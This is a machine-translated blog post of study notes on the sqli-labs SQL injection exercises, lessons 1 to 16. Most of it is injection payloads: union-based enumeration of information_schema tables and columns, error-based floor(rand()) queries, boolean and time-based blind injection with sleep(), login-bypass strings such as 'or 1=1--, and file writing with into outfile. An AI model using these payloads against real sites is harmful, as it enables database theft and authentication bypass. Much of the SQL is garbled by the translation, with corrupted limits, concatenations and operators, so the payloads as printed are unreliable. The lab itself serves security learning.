Shulou(Shulou.com)06/01 Report--

Lesson01:

Character injection

Add "id=5' and'1" in the address bar and pass the test

Add? id=5' in the address bar (malicious sql statement can be added here)-- + the test passed (annotated method)

Lesson02:

Digital injection

Id=5-2 returns the same result as id=3, indicating a digital injection

Id=2 (malicious sql statement can be added here)-- +

PS: some sql queries will be followed by limit (0jue 1) to return only the first valid query result. Here, we can make the final result return the return value of the statement we constructed by setting the previous normal id value to be invalid.

Lesson03:

Id=5 and 1 # 1

There is no change in id=5 and 1 and 2.

Id=3'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near''1century') LIMIT 0pm 1' at line 1

Indicates that there is a) in the original sql statement), the way to close is to add another)

Take advantage of: 1. Id=1') and ('1s)

2. Id=1') sql statement-- +

Lesson04:

Character query based on double quotation marks, similar to lesson03

Number of 1.order by query fields

2. Database () queries the current database name

3.user () current user

4. Information_schema.tables stores all table names (mysql)

5.union select 1 from information_schema.tables where table_schema='security' limit from information_schema.tables where table_schema='security' limit 1-- +

This is to query which tables are in the database. Use the query statement to show which query results are returned.

6. Union select 1 from information_schema.columns where table_name='users' limit column names 3-- + query the names of each column (field name) in the users table

7.union select 1 Magna group concat (column_name), 3 from information_schema.columns where table_name='users' and table_schema= "security"-- +

Alternatively, use group_concat (column_name) to return all field names

Lesson05&06:

Based on error injection:

And (select 1 from (select count (*), concat (0x3a rand ()), 0x3a from information_schema.tables group by a (), 0x3a () * 2) a database) b)-- +

Rand () gets a floating-point random number between 0 and 1

Floor () fetch floor operation

Group by is based on. Grouping

Concat () string concatenation

Count () count function

1.

(select count (*), concat (0x3a dint 0x3a dint database (), 0x3a rep 0x3a dagger (rand () * 2)) a

This representation is given to the query results (select count (*), concat (0x3a rand ()), 0x3a description (0x3a) * 2).

Take an alias a

two。

(select count (*), concat (0x3a rand ()), 0x3a from information_schema.tables group by a (), 0x3a () * 2)) a database () b

This representation gives an alias to the query result (select count (*), concat (0x3a concat 0x3a rand database (), 0x3a journal 0x3a recording (rand () * 2) a from information_schema.tables group by a)

3.

And (select 1 from (select count (*), concat (0x3a limit 0x3a, (select table_name from information_schema.tables where table_schema=database () limit 0L1), 0x3a from information_schema.tables group by a (rand () * 2)) a from information_schema.tables group by a) b)-- +

This sentence can query the name of the data table.

Lesson07:

Select * from Table into outfile'/ path / file name'

Lesson08:

Blind note based on bool:

Substr (String, int x, int y) truncates the string from x to y

Ascii (char) returns the assic code value

Lesson09&10:

Blind note based on time: according to some time functions, we can judge whether our inference is correct by controlling the return time of the result. Since the return value of the web interface is always true, it can only be judged by the time difference.

Sleep (n) process hangs for n seconds

If (1, 2, 3) if 1, then 2, otherwise 3

And (select if (assic (substr (database (), 1Pol 1)), sleep (5), NULL))-- +

Lesson11&12:

Get post injection

The commonly used "universal password":'or 1 password 1--

') or 1

'or'='or'

Login:'or 1, limit 0 # 1 # password, please feel free to enter.

But when using-- + to annotate, I don't know why the password must be'or 1'.

Lesson12 is of this type ("input")

Lesson13&14:

Based on error injection:

Lesson13') injection statement #

Common system functions and variables in mysql:

User () user name session_user () user name of the connection database database () database name vsersion () version

Curren_user current user name @ @ hostname hostname @ @ port Port @ @ datadir Database path

@ @ basedir installation path @ @ vsersion_compile_os operating system

Lesson15:

1'or blind injection

Lesson16:

Blind injection (time)

1 ") or sleep (1)

1 ") or sleep (1) = 0 (because the return value of the sleep function is 0) be careful when using or

1.

Select username,password from tables where id='input' limit 0,1

'and 1-+

two。

Select username,password from tables where id=input limit 0,1

3.

Select username,password from tables where id= ('input') limit 0Pol 1

4.

Select username,password from tables where id= ("input") limit 0jue 1

5.

? id=1' and (select 1 from (select count (*), concat (0x3a and table_name='users' limit 0x3a, ((select column_name from information_schema.columns where table_schema=database () and table_name='users' limit 1), 0x3a (rand () * 2)) a from information_schema.tables group by a) b)-+

6.

1 "--+

9.

? id=2' and sleep (5)-+

10.

? id=2 "and sleep (5)-+

? id=2 "and if (database () = 'security',sleep (5), NULL)-- +

11.

Uname=ain' union select 1 dint database ()-& passwd=admin&submit=Submit

13.

The type entered is ('input')

Uname=') and (select 1 from (select count (*), concat (0x3a and table_name='users' limit 0x3a, ((select column_name from information_schema.columns where table_schema=database () and table_name='users' limit 1), 0x3a (rand () * 2)) a from information_schema.tables group by a) b)-- & passwd=admin&submit=Submit

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.